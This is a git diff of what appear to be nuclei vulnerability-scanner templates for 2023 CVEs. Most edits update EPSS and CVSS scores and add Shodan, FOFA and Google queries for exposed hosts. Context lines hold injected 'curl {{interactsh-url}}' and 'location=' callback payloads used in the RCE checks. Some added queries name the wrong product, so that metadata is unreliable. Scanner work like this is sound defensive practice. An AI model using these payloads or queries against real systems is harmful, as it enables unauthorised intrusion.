f4b580719f..7fb02e0450 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1880 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.3203 + epss-score: 0.00109 + epss-percentile: 0.43829 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: phpmyfaq product: phpmyfaq shodan-query: http.html:"phpmyfaq" + fofa-query: body="phpmyfaq" tags: cve2023,cve,huntr,xss,phpmyfaq http: diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index c1dba8bb95..0f60b833ad 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 - epss-score: 0.00203 - epss-percentile: 0.57653 + epss-score: 0.00388 + epss-percentile: 0.73155 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 3f5115caac..b645cbf988 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -3,7 +3,7 @@ id: CVE-2023-1892 info: name: Sidekiq < 7.0.8 - Cross-Site Scripting author: ritikchaddha,princechaddha - severity: high + severity: critical description: | An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system. reference: @@ -11,18 +11,21 @@ info: - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214 - https://nvd.nist.gov/vuln/detail/CVE-2023-1892 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L - cvss-score: 8.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 cve-id: CVE-2023-1892 cwe-id: CWE-79 + epss-score: 0.02595 + epss-percentile: 0.90273 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: contribsys product: sidekiq + shodan-query: http.title:"sidekiq" fofa-query: title="Sidekiq" + google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 53ca70e617..abb4f85238 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 - epss-score: 0.38542 - epss-percentile: 0.97132 + epss-score: 0.37606 + epss-percentile: 0.972 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 4783e1fe8b..c026ccc8b8 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2009 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.3232 + epss-score: 0.00099 + epss-percentile: 0.41053 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 1f3d57af08..13fa0f3d0d 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00374 - epss-percentile: 0.722 + epss-score: 0.00302 + epss-percentile: 0.69552 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index df356bf630..d0b1f9cc3e 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -23,8 +23,8 @@ info: max-request: 1 vendor: dedecms product: dedecms - fofa-query: app="DedeCMS" shodan-query: http.html:"dedecms" + fofa-query: app="DedeCMS" tags: cve,cve2023,dedecms,lfi http: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 98345d1968..8c6a99bf46 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.29094 - epss-percentile: 0.96766 + epss-score: 0.25579 + epss-percentile: 0.96694 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" + fofa-query: title="vrealize log insight" + google-query: intitle:"vrealize log insight" tags: cve2023,cve,vmware,aria,rce,oast http: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 5c4d6d49fd..ac840d783e 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.96408 - epss-percentile: 0.99538 + epss-score: 0.9635 + epss-percentile: 0.99552 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,6 +32,7 @@ info: product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 861f3de03f..9266fed72d 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-20888 cwe-id: CWE-502 - epss-score: 0.35911 - epss-percentile: 0.96766 + epss-score: 0.21995 + epss-percentile: 0.96459 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" + fofa-query: title="vmware vrealize network insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 03cddd74fc..979a90e51f 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.09004 - epss-percentile: 0.94043 + epss-score: 0.37918 + epss-percentile: 0.9721 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" + fofa-query: title="vmware vrealize network insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 3ef490f294..bfeaa51bfe 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index ccc03dcaa9..0e5d746ec9 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2130 cwe-id: CWE-89 - epss-score: 0.01554 - epss-percentile: 0.85779 + epss-score: 0.02537 + epss-percentile: 0.9017 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 3731dd9ca1..1542ee4351 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.3232 + epss-percentile: 0.33655 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 06d086c21f..f6a39ea7ba 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-22232 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.13033 - epss-percentile: 0.95385 + epss-score: 0.12731 + epss-percentile: 0.95463 cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: adobe product: connect shodan-query: title:"Adobe Connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: packetstorm,cve2023,cve,adobe,lfd,download http: diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index c9390d770b..35dfc7eedd 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2224 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41348 + epss-score: 0.00101 + epss-percentile: 0.41469 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 827e860014..de72d1556a 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -15,12 +15,14 @@ info: cvss-score: 9.1 cve-id: CVE-2023-2227 cwe-id: CWE-285 + epss-score: 0.01292 + epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: vendor: modoboa product: modoboa - fofa-query: body="Modoboa" shodan-query: http.favicon.hash:1949005079 + fofa-query: body="Modoboa" tags: cve,cve2023,modoboa,exposure,disclosure http: diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 4e668bef11..6083bb470a 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.00877 - epss-percentile: 0.82098 + epss-score: 0.00945 + epss-percentile: 0.83107 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: web2py product: web2py shodan-query: http.favicon.hash:-1680052984 + fofa-query: icon_hash=-1680052984 tags: cve,cve2023,web2py,redirect,authenticated http: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index a138f73917..31e7f7266f 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22463 cwe-id: CWE-798 - epss-score: 0.02033 - epss-percentile: 0.88693 + epss-score: 0.01936 + epss-percentile: 0.88621 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index cb4ece937a..a597b15ad2 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 - epss-score: 0.03365 - epss-percentile: 0.91177 + epss-score: 0.07825 + epss-percentile: 0.94208 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index bb42a9d8b3..5e9e4c3848 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 - epss-score: 0.01487 - epss-percentile: 0.86532 + epss-score: 0.03554 + epss-percentile: 0.91598 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index e27bd57a93..42bdbd181c 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -18,14 +18,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.95682 - epss-percentile: 0.99291 + epss-score: 0.97313 + epss-percentile: 0.99875 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: atlassian product: confluence_data_center + shodan-query: http.component:"atlassian confluence" fofa-query: app="ATLASSIAN-Confluence" tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index f78c29e559..60b9df90e3 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22518 cwe-id: CWE-863 - epss-score: 0.97011 - epss-percentile: 0.99725 + epss-score: 0.96267 + epss-percentile: 0.99528 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 22fe7e3409..af36609021 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2252 cwe-id: CWE-22 epss-score: 0.00129 - epss-percentile: 0.46802 + epss-percentile: 0.4773 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index aaed7fb243..3e8b5fb5f5 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -18,15 +18,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22527 cwe-id: CWE-74 - epss-score: 0.96568 - epss-percentile: 0.99595 + epss-score: 0.97459 + epss-percentile: 0.99955 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2023,confluence,rce,ssti,kev + fofa-query: app="atlassian-confluence" + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index ab98f22962..43abde8090 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.06157 - epss-percentile: 0.92833 + epss-score: 0.03698 + epss-percentile: 0.91758 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: securepoint product: unified_threat_management shodan-query: title:"Securepoint UTM" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint http: diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index b159a55c12..c852e683c0 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2272 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26204 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index d52b60279c..5cebe1e454 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -15,13 +15,14 @@ info: - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ - https://rcesecurity.com + - https://github.com/MrTuxracer/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.03131 - epss-percentile: 0.90084 + epss-score: 0.03238 + epss-percentile: 0.91228 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,8 @@ info: vendor: securepoint product: unified_threat_management shodan-query: title:"Securepoint UTM" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory http: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 4ae8b59b80..6a6de73694 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23161 cwe-id: CWE-79 - epss-score: 0.00107 - epss-percentile: 0.43178 + epss-score: 0.00315 + epss-percentile: 0.702 cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index de9d21f533..870e53afa4 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.40081 - epss-percentile: 0.96928 + epss-score: 0.96326 + epss-percentile: 0.99545 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index cc92209152..230471e3c6 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.05507 - epss-percentile: 0.92486 + epss-score: 0.05363 + epss-percentile: 0.93093 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,10 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index d6f8c53b56..21341d813d 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.10655 - epss-percentile: 0.94927 + epss-score: 0.11793 + epss-percentile: 0.95309 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index eda7da80c5..0dbd72dd1e 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45193 + epss-score: 0.0012 + epss-percentile: 0.46205 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: fullworksplugins product: quick_event_manager framework: wordpress + shodan-query: http.html:/wp-content/plugins/quick-event-manager + fofa-query: body=/wp-content/plugins/quick-event-manager publicwww-query: "/wp-content/plugins/quick-event-manager" tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 37f3c3f73a..5eed092666 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -14,13 +14,15 @@ info: - https://wordpress.org/plugins/login-with-phone-number/ - https://www.tenable.com/security/research/tra-2023-3 - https://nvd.nist.gov/vuln/detail/CVE-2023-23492 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.05192 - epss-percentile: 0.92229 + epss-score: 0.06178 + epss-percentile: 0.93551 cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 04fa783e7a..32942a9671 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 - epss-score: 0.00875 - epss-percentile: 0.82072 + epss-score: 0.01406 + epss-percentile: 0.86426 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" + google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 6d0fee1022..def70983fc 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.96314 - epss-percentile: 0.9944 + epss-score: 0.93208 + epss-percentile: 0.99053 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: joomla product: joomla\! shodan-query: html:"Joomla! - Open Source Content Management" + fofa-query: body="joomla! - open source content management" tags: cve,cve2023,joomla,kev http: diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5661dadb7d..8ffeb915f2 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24044 cwe-id: CWE-601 - epss-score: 0.00155 - epss-percentile: 0.51774 + epss-score: 0.00174 + epss-percentile: 0.54488 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: obsidian shodan-query: title:"Plesk Obsidian" fofa-query: title="Plesk Obsidian" + google-query: intitle:"plesk obsidian" tags: cve2023,cve,header,injection,plesk,obsidian http: diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 0634d19106..276c8e855f 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-24243 cwe-id: CWE-918 - epss-score: 0.00541 - epss-percentile: 0.7489 + epss-score: 0.01019 + epss-percentile: 0.83727 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b046979578..cff34a912b 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24278 cwe-id: CWE-79 - epss-score: 0.0011 - epss-percentile: 0.4314 + epss-score: 0.00158 + epss-percentile: 0.52245 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 + fofa-query: icon_hash=1099097618 tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 59b943a776..1e612e38c9 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -13,13 +13,14 @@ info: - https://github.com/i7MEDIA/mojoportal/ - https://www.mojoportal.com/ - https://nvd.nist.gov/vuln/detail/CVE-2023-24322 + - https://github.com/blakduk/Advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24322 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37778 + epss-score: 0.00157 + epss-percentile: 0.52131 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: mojoportal product: mojoportal shodan-query: html:"mojoPortal" + fofa-query: body="mojoportal" tags: cve,cve2023,cves,mojoportal,xss http: diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index cc500b1fe8..38441aeee6 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.0101 - epss-percentile: 0.8202 + epss-score: 0.05227 + epss-percentile: 0.93007 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: gateway shodan-query: title:"Citrix Gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: cve2023,cve,citrix,xss,adc http: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 904c250e19..cfe10e1c0c 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -21,8 +21,8 @@ 